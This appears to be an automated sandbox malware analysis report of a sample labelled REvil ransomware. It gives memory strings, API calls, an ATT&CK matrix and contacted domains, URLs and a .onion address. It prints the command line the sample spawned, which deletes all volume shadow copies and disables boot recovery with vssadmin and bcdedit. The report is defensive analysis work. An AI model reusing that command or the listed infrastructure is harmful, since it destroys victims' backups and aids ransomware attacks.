Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\r\y
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\r\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5\o
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\f\#
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\V
Source: myfile.exe, 00000000.00000003.1960456490.00000000041B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1960597717.000000000420B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.1_none_97e0d8d7edeea164\
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\f\!
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\f\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\
Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1999993146.000000000438B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\r\zB
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..nents-rdv.resources_31bf3856ad364e35_10.0.19041.1_en-us_b3d1ef0d088d6955\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5\
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\f\Q
Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\f\:u
Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: d64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\f\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\

Source: C:\Users\user\Desktop\myfile.exe	API call chain: ExitProcess graph end node			graph_0-3594
Source: C:\Users\user\Desktop\myfile.exe	API call chain: ExitProcess graph end node			graph_0-3585

Source: C:\Users\user\Desktop\myfile.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00274AAB rdtsc

0_2_00274AAB

Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_0027464B mov ecx, dword ptr fs:[00000030h]		0_2_0027464B
Source: C:\Users\user\Desktop\myfile.exe	Code function: 0_2_002742E5 mov eax, dword ptr fs:[00000030h]		0_2_002742E5

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00273C1E HeapCreate,GetProcessHeap,

0_2_00273C1E

Source: C:\Users\user\Desktop\myfile.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00273DEE cpuid

0_2_00273DEE

Source: C:\Users\user\Desktop\myfile.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_0027438B GetUserNameW,

0_2_0027438B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	12 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 DLL Side-Loading	OS Credential Dumping	11 Peripheral Device Discovery	Remote Services	1 Archive Collected Data	1 Data Obfuscation	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	11 File Deletion	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Inhibit System Recovery
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Masquerading	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	21 Encrypted Channel	Automated Exfiltration	1 Defacement
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Virtualization/Sandbox Evasion	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
myfile.exe	91%	Virustotal		Browse
myfile.exe	97%	ReversingLabs	Win32.Ransomware.REvil
myfile.exe	100%	Avira	TR/Crypt.XPACK.Gen
myfile.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
pansionatblago.ru	3%	Virustotal	Browse
parksideseniorliving.net	4%	Virustotal	Browse
www.altitudetrampolinepark.com	0%	Virustotal	Browse
innervisions-id.com	2%	Virustotal	Browse
chainofhopeeurope.eu	2%	Virustotal	Browse
maxcube24.com.ua	6%	Virustotal	Browse
www.mieleshopping.it	0%	Virustotal	Browse
hostaletdelsindians.es	3%	Virustotal	Browse
bayshoreelite.com	1%	Virustotal	Browse
lexced.com	1%	Virustotal	Browse
relevantonline.eu	3%	Virustotal	Browse
abulanov.com	2%	Virustotal	Browse
testitjavertailut.net	2%	Virustotal	Browse
lb.wordpress.com	0%	Virustotal	Browse
magrinya.net	2%	Virustotal	Browse
stanleyqualitysystems.com	5%	Virustotal	Browse
holocine.de	5%	Virustotal	Browse
oscommunity.de	2%	Virustotal	Browse
georgemuncey.com	1%	Virustotal	Browse
nbva.co.uk	4%	Virustotal	Browse
skoczynski.eu	3%	Virustotal	Browse
rsidesigns.com	2%	Virustotal	Browse
business-basic.de	1%	Virustotal	Browse
altitudeboise.com	4%	Virustotal	Browse
mieleshopping.it	1%	Virustotal	Browse
lashandbrowenvy.com	1%	Virustotal	Browse
m2graph.fr	2%	Virustotal	Browse
altitudetrampolinepark.com	0%	Virustotal	Browse
vitoriaecoturismo.com.br	2%	Virustotal	Browse
bundan.com	1%	Virustotal	Browse
c-sprop.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://schema.org	0%	URL Reputation	safe
https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa3	0%	Avira URL Cloud	safe
https://holocine.de:443/data/assets/hxdtlt.gifgicdxmun.gifesource0	0%	Avira URL Cloud	safe
https://princebet88.site/assets/images/banner-princebet88.webp	0%	Avira URL Cloud	safe
https://90nguyentuan.com/	0%	Avira URL Cloud	safe
https://tailwindcss.com	0%	Avira URL Cloud	safe
https://www.bundan.com/xmlrpc.php	0%	Avira URL Cloud	safe
https://www.almamidwifery.com/content/assets/jlbaveucagau.pngLocationETagAuthe-RangeContent-Monteion	0%	Avira URL Cloud	safe
https://karnesstanleyhvac.com/w	0%	Avira URL Cloud	safe
https://90nguyentuan.com/	2%	Virustotal		Browse
https://tailwindcss.com	0%	Virustotal		Browse
https://m2graph.fr/m	0%	Avira URL Cloud	safe
https://oscommunity.de:443/wp-content/pictures/vuvqcuzorejq.pngx.gifage	0%	Avira URL Cloud	safe
https://parksideseniorliving.net/wp-json/	0%	Avira URL Cloud	safe
http://stayblue.basecom.eu	0%	Avira URL Cloud	safe
https://github.com/sindresorhus/modern-normalize	0%	Avira URL Cloud	safe
https://oscommunity.de/wp-content/pictures/vuvqcuzorejq.png	0%	Avira URL Cloud	safe
https://m2graph.fr/S	0%	Avira URL Cloud	safe
http://stayblue.basecom.eu	0%	Virustotal		Browse
http://m2graph.fr	0%	Avira URL Cloud	safe
https://github.com/sindresorhus/modern-normalize	0%	Virustotal		Browse
https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/site-bundle.31e4754f5aa3	0%	Virustotal		Browse
https://www.lexced.com/9E	0%	Avira URL Cloud	safe
https://a.storyblok.com/f/201186/1920x2746/71a2ff4150/truegrit_full_purple.jpg);background-position:	0%	Avira URL Cloud	safe
https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg	100%	Avira URL Cloud	malware
https://parksideseniorliving.net/wp-content/uploads/2019/08/Parkside-Logo.png	0%	Avira URL Cloud	safe
https://s3.amazonaws.com/a.storyblok.com/f/20	0%	Avira URL Cloud	safe
http://m2graph.fr	2%	Virustotal		Browse
https://karnesstanleyhvac.com/content/images/gv.pngpng	0%	Avira URL Cloud	safe
https://www.bundan.com/wp-json/	0%	Avira URL Cloud	safe
https://almamidwifery.com/	0%	Avira URL Cloud	safe
https://magrinya.net/static/temp/mdjsvnauuvkc.jpg	0%	Avira URL Cloud	safe
https://a.storyblok.com/f/201186/538x872/eb9c0d6ee6/attraction-main-court.png	0%	Avira URL Cloud	safe
https://almamidwifery.com/	1%	Virustotal		Browse
https://princebet88.site/	0%	Avira URL Cloud	safe
https://vitoriaecoturismo.com.br/admin/graphic/tajahxayexuseayc.jpg	0%	Avira URL Cloud	safe
https://90nguyentuan.com/wp-content/pics/rbfaqbvnxelf.jpg	0%	Avira URL Cloud	safe
https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=	0%	Avira URL Cloud	safe
https://www.almamidwifery.com/~	0%	Avira URL Cloud	safe
https://hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg	100%	Avira URL Cloud	malware
https://testitjavertailut.net/	0%	Avira URL Cloud	safe
https://princebet88.site/	0%	Virustotal		Browse
https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/favicon.ico	0%	Avira URL Cloud	safe
https://innervisions-id.com/png	0%	Avira URL Cloud	safe
https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=	0%	Virustotal		Browse
https://amelielecompte.wordpress.com/0	0%	Avira URL Cloud	safe
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061	0%	Avira URL Cloud	safe
https://hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpggx.gifage	100%	Avira URL Cloud	malware
https://innervisions-id.com/wp-content/images/kpgkqb.jpgq	0%	Avira URL Cloud	safe
https://vitoriaecoturismo.com.br/	0%	Avira URL Cloud	safe
https://innervisions-id.com:443/wp-content/images/kpgkqb.jpg.gife0	0%	Avira URL Cloud	safe
https://innervisions-id.com/wp-content/images/kpgkqb.jpgw	0%	Avira URL Cloud	safe
https://m2graph.fr:443/news/pics/sovuwxryinfm.pngfc/lgul.jpg4692b	0%	Avira URL Cloud	safe
https://testitjavertailut.net/	2%	Virustotal		Browse
https://princebet88.site/assets/images/logo-princebet88.webp	0%	Avira URL Cloud	safe
https://chomiksy.net/png	0%	Avira URL Cloud	safe
https://innervisions-id.com/wp-content/images/kpgkqb.jpgr	0%	Avira URL Cloud	safe
https://pansionatblago.ru/wp-content/assets/umjrglicgx.jpg	0%	Avira URL Cloud	safe
http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24B	0%	Avira URL Cloud	safe
https://a.storyblok.com/f/201186/174x174/6a375a03d8/become-a-member-new.png	0%	Avira URL Cloud	safe
https://pansionatblago.ru/t$~	0%	Avira URL Cloud	safe
https://amelielecompte.wordpress.com/Q	0%	Avira URL Cloud	safe
https://amelielecompte.wordpress.com/O	0%	Avira URL Cloud	safe
https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0	100%	Avira URL Cloud	malware
https://a.storyblok.com/f/201186/428x668/95a47a6a61/updatedmobilehero.jpg	0%	Avira URL Cloud	safe
https://bayshoreelite.com/data/game/mfkyhvlfokmitv.png	0%	Avira URL Cloud	safe
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/	0%	Avira URL Cloud	safe
https://vitoriaecoturismo.com.br/	2%	Virustotal		Browse
https://chomiksy.net:443/wp-content/temp/vudowd.png811-000d3aa4692b	0%	Avira URL Cloud	safe
https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9	100%	Avira URL Cloud	malware
https://avisioninthedesert.com/	0%	Avira URL Cloud	safe
https://www.bundan.com/	0%	Avira URL Cloud	safe
https://nbva.co.uk/wp-json/	0%	Avira URL Cloud	safe
https://rsidesigns.com/wp-content/assets/iybw.jpg	0%	Avira URL Cloud	safe
https://www.almamidwifery.com/content/assets/jlbaveucagau.png	0%	Avira URL Cloud	safe
https://princebet88.site/amp/	0%	Avira URL Cloud	safe
https://bayshoreelite.com/feed/	0%	Avira URL Cloud	safe
https://almamidwifery.com/content/assets/jlbaveucagau.png	0%	Avira URL Cloud	safe
https://parksideseniorliving.net/#/schema/logo/image/	0%	Avira URL Cloud	safe
https://yoast.com/wordpress/plugins/seo/	0%	Avira URL Cloud	safe
https://chainofhopeeurope.eu/?	0%	Avira URL Cloud	safe
https://lexced.com/	0%	Avira URL Cloud	safe
https://avisioninthedesert.com/wp-content/graphic/lgul.jpg	0%	Avira URL Cloud	safe
https://mursall.de/comments/feed/	0%	Avira URL Cloud	safe
https://a.storyblok.com/f/201186/173x191/ff8a0137ac/frame-8707-3.png	0%	Avira URL Cloud	safe
https://mieleshopping.it/wp-content/game/doiathwnvkwf.gif	0%	Avira URL Cloud	safe
https://karnesstanleyhvac.com/content/images/gv.png	0%	Avira URL Cloud	safe
https://holocine.de/data/assets/hxdtlt.gif	0%	Avira URL Cloud	safe
https://a.storyblok.com/f/201186/1920x2746/013c53af19/truegrit_full_light.jpg	0%	Avira URL Cloud	safe
https://mieleshopping.it:443/wp-content/game/doiathwnvkwf.gifa4692b	0%	Avira URL Cloud	safe
https://altitudetrampolinepark.com/	0%	Avira URL Cloud	safe
https://pansionatblago.ru/	0%	Avira URL Cloud	safe
https://kenmccallum.com/uploads/pictures/gcgicdxmun.gif	0%	Avira URL Cloud	safe
http://m2graph.fr/F	0%	Avira URL Cloud	safe
https://chomiksy.net/	0%	Avira URL Cloud	safe
https://ikadomus.com/news/tmp/zrxchmwcslab.gif	0%	Avira URL Cloud	safe
https://satoblog.org:443/uploads/image/fixizcyhfz.jpgrces	0%	Avira URL Cloud	safe
https://www.lexced.com/static/tmp/vd.gifLMEMH	0%	Avira URL Cloud	safe
https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gifHk	0%	Avira URL Cloud	safe
https://parksideseniorliving.net/admin/temp/eghuey.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
parksideseniorliving.net	35.215.83.253	true	true	4%, Virustotal, Browse	unknown
pansionatblago.ru	89.108.65.79	true	true	3%, Virustotal, Browse	unknown
www.altitudetrampolinepark.com	104.26.0.120	true	false	0%, Virustotal, Browse	unknown
innervisions-id.com	95.215.226.251	true	true	2%, Virustotal, Browse	unknown
chainofhopeeurope.eu	51.15.159.75	true	true	2%, Virustotal, Browse	unknown
maxcube24.com.ua	185.68.16.21	true	true	6%, Virustotal, Browse	unknown
www.mieleshopping.it	35.214.166.193	true	false	0%, Virustotal, Browse	unknown
princebet88.site	172.67.158.62	true	false		unknown
hostaletdelsindians.es	185.15.78.186	true	true	3%, Virustotal, Browse	unknown
karnesstanleyhvac.com	208.73.140.70	true	false		unknown
bayshoreelite.com	160.153.0.174	true	true	1%, Virustotal, Browse	unknown
lexced.com	87.118.122.41	true	true	1%, Virustotal, Browse	unknown
testitjavertailut.net	188.114.96.3	true	true	2%, Virustotal, Browse	unknown
relevantonline.eu	85.10.140.71	true	true	3%, Virustotal, Browse	unknown
abulanov.com	188.246.227.29	true	true	2%, Virustotal, Browse	unknown
lb.wordpress.com	192.0.78.13	true	false	0%, Virustotal, Browse	unknown
magrinya.net	217.160.0.18	true	true	2%, Virustotal, Browse	unknown
stanleyqualitysystems.com	208.73.140.70	true	true	5%, Virustotal, Browse	unknown
